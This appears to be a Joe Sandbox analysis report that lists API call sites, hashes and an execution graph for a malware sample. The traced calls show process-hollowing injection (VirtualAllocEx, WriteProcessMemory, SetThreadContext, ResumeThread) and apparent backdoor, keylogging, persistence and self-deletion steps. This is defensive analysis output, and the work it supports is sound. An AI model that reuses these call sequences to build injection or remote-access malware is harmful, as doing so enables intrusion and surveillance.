                              • API String ID: 963392458-0

                              Control-flow Graph

                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048A1E3E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0

                              Control-flow Graph

                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0280AFFE
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0

                              Control-flow Graph

                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 028059C9
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0

                              Control-flow Graph

                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 028059C9
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0

                              Control-flow Graph

                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 048A1610
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0

                              Control-flow Graph

                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 048A1610
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0

                              Control-flow Graph

                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048A16F0
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0

                              Control-flow Graph

                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048A102E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0

                              Control-flow Graph

                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048A16F0
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0

                              Control-flow Graph

                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048A102E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0

                              Control-flow Graph

                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0280D717
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0

                              Control-flow Graph

                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0280D717
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0280B079,00000800,00000000,00000000), ref: 0280B28A
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0280B079,00000800,00000000,00000000), ref: 0280B28A
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 048A152E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 048A152E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 360371d1e9ce8782c4b28722510cee0fb6e86db577acee6b54ba3829ae87f76b
                              • Instruction ID: 7a47a4fe029225fee7f54e86a745a7264ca8c2f43ce3c5f2e445191f817ba256
                              • Opcode Fuzzy Hash: 360371d1e9ce8782c4b28722510cee0fb6e86db577acee6b54ba3829ae87f76b
                              • Instruction Fuzzy Hash: EA1128719043488BEB10DFAAC4457EFFBF4AB48324F148459D519A7240C775A544CBA5
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048A5345
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: d9b6e7a2265e2e14fcadc51a1a2b838be24109f53cde55d542caee56538332d1
                              • Instruction ID: c06622926ab7db38a37da2fc323f4f869640bf6d1fd38d49ba1e2dab62d0dddd
                              • Opcode Fuzzy Hash: d9b6e7a2265e2e14fcadc51a1a2b838be24109f53cde55d542caee56538332d1
                              • Instruction Fuzzy Hash: 9A113AB58003489FDB10DF99C444BDEFBF4EB48314F108519E518A7300C3B5A544CFA5
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0280AFFE
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: a55d18c54267d20809eebcaa590f2cbc9b1c6071c94909829f585312e77380b2
                              • Instruction ID: 783d48ca0c859b09e62802faf6285c5779faa0b9c5ac69d5f2273183534f0b6d
                              • Opcode Fuzzy Hash: a55d18c54267d20809eebcaa590f2cbc9b1c6071c94909829f585312e77380b2
                              • Instruction Fuzzy Hash: EE1113BAC003498FDB10CF9AC844BDEFBF4EB48314F10846AD528A7250C375A545CFA5
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048A5345
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 9219b98fd1121445475dd2e2bdc69fb098805c1aed80a4ec6009317845064ee2
                              • Instruction ID: 8314312904a54957969a4419dd1baa21aafa4f8309df255cb46a16c657d8037a
                              • Opcode Fuzzy Hash: 9219b98fd1121445475dd2e2bdc69fb098805c1aed80a4ec6009317845064ee2
                              • Instruction Fuzzy Hash: 841103B58002489FEB10CF99D885BEEFBF4EB88310F14851AE518A7250C3B5A984CFA1
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443480575.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c4d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eaa12d84a687a03923bb11db2210eaa70b0ff57d9de5088418b61f642e8e30b7
                              • Instruction ID: 05483ddfcc5b3f05a80293af5176179e2e94a863fdf46f5280de488d28d3b84f
                              • Opcode Fuzzy Hash: eaa12d84a687a03923bb11db2210eaa70b0ff57d9de5088418b61f642e8e30b7
                              • Instruction Fuzzy Hash: 79213AB1504244DFDB15EF10D9C0B26BF65FB84328F20C56DE80A0B256C736D956CBA2
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35ecbb8282a860e9442ce80100570f39d8f8fc283dc3111899ed70f2fe7f0341
                              • Instruction ID: 109a7b73b873517aa3f401e6a5e5a9c4d0fcc4bd0158caac2e612e9881171763
                              • Opcode Fuzzy Hash: 35ecbb8282a860e9442ce80100570f39d8f8fc283dc3111899ed70f2fe7f0341
                              • Instruction Fuzzy Hash: 12212679504304EFDB25DF10D9C0B26BBA5FB84315F20C5ADEC4A4B292C376DC8ACA66
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: acee86fb6ddd216ef9d0e26eb83b8d918420f91194ba0a07100d8f68a67c3b33
                              • Instruction ID: 9c6014817411a7875e7651fcf10549dba3f30dad0608c47833c6bbe7822d7b90
                              • Opcode Fuzzy Hash: acee86fb6ddd216ef9d0e26eb83b8d918420f91194ba0a07100d8f68a67c3b33
                              • Instruction Fuzzy Hash: F921D379504304DFDB24DF10D5C4B16BBA5EB84315F20C569EC4A4B296C336D88BCA66
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 650d2aaf9d14a0ca58d68a131f0a9bea542f5be287f4afe9a5377f2ea25c643f
                              • Instruction ID: d6862d01481bc65f6f1652924ef435f0d34174ffb3fe215a2e0be380d0b506c5
                              • Opcode Fuzzy Hash: 650d2aaf9d14a0ca58d68a131f0a9bea542f5be287f4afe9a5377f2ea25c643f
                              • Instruction Fuzzy Hash: 48218E755093808FDB12CF20D994715BF71EB86314F28C5EAD8498F2A7C33A984ACB62
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443480575.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c4d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                              • Instruction ID: 1b87a617bcef0412d203080851575eea98de292c9568fb342bfb992402fe1959
                              • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                              • Instruction Fuzzy Hash: 5011E6B6504280CFCB16DF10D5C4B16BF72FB94318F24C6A9EC4A4B656C336D956CBA1
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction ID: 56df0c78485732b5298e16b8908aecf7888e10588b080726782b15da2a175807
                              • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction Fuzzy Hash: EC118E79504340DFDB25CF10D9C4B15BBA1FB84314F24C6ADDC4A4B656C33AD98ACB51

Execution Graph

Execution Coverage: 3.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 11.3%
Total number of Nodes: 964
Total number of Limit Nodes: 2
4326->4327 4328 409ea1 Sleep 4327->4328 4329 409eae 4327->4329 4328->4329 4330 409eb7 7 API calls 4329->4330 4331 409f1d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4329->4331 4330->4331 4332 401289 6 API calls 4331->4332 4333 409f3a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4332->4333 4334 40efb5 20 API calls 4333->4334 4350 409f52 4334->4350 4337 401289 6 API calls 4338 409f8a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4337->4338 4339 40efb5 20 API calls 4338->4339 4340 409f9f 4339->4340 4341 401289 6 API calls 4340->4341 4342 409fb5 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ gethostbyname 4341->4342 4342->4350 4343 401289 6 API calls 4344 409ff1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi htons 4343->4344 4344->4350 4345 401289 6 API calls 4348 40a6f4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi Sleep 4345->4348 4346 401b3c 2 API calls 4346->4350 4347 40a050 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4347->4350 4348->4350 4349 401289 6 API calls 4351 40a024 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4349->4351 4350->4343 4350->4345 4350->4346 4350->4347 4350->4349 4353 401289 6 API calls 4350->4353 4862 402109 4350->4862 4867 402168 connect 4350->4867 4351->4350 4354 40a093 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4353->4354 4355 40a0a0 7 API calls 4354->4355 4356 40a112 4354->4356 4355->4356 4357 40a125 sprintf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ _itoa 4356->4357 4358 401289 6 API calls 4357->4358 4359 40a16c GetTickCount 4358->4359 4870 40ed35 _itoa 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4359->4870 4364 40edd3 7 API calls 4366 40a186 4364->4366 4366->4364 4367 401289 6 API calls 4366->4367 4871 40e898 GetLastInputInfo GetTickCount 4366->4871 4872 40ed35 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4366->4872 4873 40e85d GetForegroundWindow GetWindowTextW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 4366->4873 4874 40818a GetLocaleInfoA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4366->4874 4368 40a21a 34 API calls 4367->4368 4875 402198 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4368->4875 4370 40a446 39 API calls 4878 40221c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4370->4878 4372 40a628 4374 401289 6 API calls 4372->4374 4887 404336 4372->4887 4375 40a649 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4374->4375 4376 40a656 7 API calls 4375->4376 4377 40a6c8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4375->4377 4376->4377 4377->4350 4378->4084 4382 40298e 4379->4382 4383 4029ba ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4382->4383 4383->4087 4384->4090 4386 40f645 4385->4386 4395 40f652 4386->4395 4388 40f034 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4388->4091 4388->4101 4390 40f606 4389->4390 4391 401bb5 ??2@YAPAXI 4390->4391 4392 40f60e 4391->4392 4393 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4392->4393 4394 40f08b 4393->4394 4394->4098 4396 40f65e 4395->4396 
4399 40f687 4396->4399 4398 40f675 4398->4388 4400 40f754 4399->4400 4406 40f6a6 4399->4406 4401 40f762 4400->4401 4402 40f7a3 4400->4402 4403 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4401->4403 4405 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4402->4405 4425 40f72d 4402->4425 4404 40f774 4403->4404 4407 401b8d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4404->4407 4408 40f7b6 4405->4408 4426 401bb5 4406->4426 4409 40f78d 4407->4409 4448 40f81d 4408->4448 4444 40f7fe 4409->4444 4414 40f7fe ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4414->4425 4420 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4421 40f70c 4420->4421 4437 401b6b 4421->4437 4425->4398 4451 401bec 4426->4451 4428 401bc2 4429 40863b 4428->4429 4432 408645 4429->4432 4430 40865e 4433 401b8d 4430->4433 4432->4430 4454 401bc8 4432->4454 4434 401b9b 4433->4434 4435 401baf 4433->4435 4434->4435 4436 401bc8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4434->4436 4435->4420 4436->4434 4438 401b75 4437->4438 4439 401b87 4438->4439 4461 401bdc 4438->4461 4441 403626 4439->4441 4472 40fc2c free 4441->4472 4443 403631 4443->4425 4445 40f805 4444->4445 4446 40f81a 4445->4446 4447 40f80a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4445->4447 4446->4425 4447->4445 4449 40f829 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4448->4449 4450 40f7c6 4448->4450 4449->4449 4449->4450 4450->4414 4452 401bf6 4451->4452 4453 401bf8 ??2@YAPAXI 4451->4453 4452->4453 4453->4428 4457 401c04 4454->4457 4458 401c11 4457->4458 4459 401bd6 4458->4459 4460 401c17 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4458->4460 4459->4432 4460->4459 4464 401c2c 4461->4464 4467 401c3b 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4464->4467 4468 401c4d 4467->4468 4470 401be7 4467->4470 4471 40fc2c free 4468->4471 4470->4438 4471->4470 4472->4443 4474 408693 4473->4474 4475 408698 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4474->4475 4476 40854f 4474->4476 4475->4474 4476->4110 4482 401305 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4477->4482 4479 401300 4483 40fcba 4479->4483 4482->4479 4486 40fc8e 4483->4486 4485 401324 4485->4129 4487 40fca3 __dllonexit 4486->4487 4488 40fc97 _onexit 4486->4488 4487->4485 4488->4485 4489->4149 4491 401285 4490->4491 4492 40123f 4490->4492 4491->4145 4493 401289 6 API calls 4492->4493 4494 401252 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4493->4494 4495 401261 exit 4494->4495 4496 401269 4494->4496 4495->4496 4497 401289 6 API calls 4496->4497 4498 401277 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4497->4498 4498->4491 4499 401280 4498->4499 4504 406988 4499->4504 4501->4160 4503 401094 4502->4503 4503->4171 4503->4173 4505 4069a7 4504->4505 4506 40699d 4504->4506 4508 4069b5 4505->4508 4546 40e4ab ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4505->4546 4541 40524e TerminateThread 4506->4541 4509 4069c8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4508->4509 4510 4069dc 4508->4510 4512 409132 2 API calls 4509->4512 4513 4069fd 4510->4513 4514 4069ed ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4510->4514 4512->4510 4516 406a0e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4513->4516 4522 406a30 4513->4522 4515 409132 2 API calls 4514->4515 4515->4513 4549 408fda RegCreateKeyA 4516->4549 4518 406a5e 4520 406a81 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4518->4520 4521 406a6a ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4518->4521 4519 406a3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4523 408fda 7 API calls 4519->4523 4554 408f64 RegOpenKeyExA 4520->4554 4524 409132 2 API calls 4521->4524 4522->4518 4522->4519 4523->4518 4526 406a7e 4524->4526 4526->4520 4527 406ad4 4528 406af1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegDeleteKeyA 4527->4528 4529 406adb GetModuleFileNameA 4527->4529 4530 406b01 getenv ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4528->4530 4529->4530 4531 406b58 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4530->4531 4532 406b6b SetFileAttributesA 4530->4532 4531->4532 4533 406b80 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4532->4533 4534 406b7d 4532->4534 4535 406d21 exit 4533->4535 4536 406bae 8 API calls 4533->4536 4534->4533 4537 406c8a ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4536->4537 4538 406c2a 7 API calls 4536->4538 4539 406c98 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4537->4539 4540 406cdb ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ShellExecuteA 4537->4540 4538->4537 4539->4540 4540->4535 4542 40526b UnhookWindowsHookEx TerminateThread 4541->4542 4543 40527e 4541->4543 4542->4543 4557 40520c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4543->4557 4560 40f234 FindFirstFileA 4546->4560 4550 408ff1 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegSetValueExA RegCloseKey 4549->4550 4551 409039 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4549->4551 4552 409028 4550->4552 4553 40902a 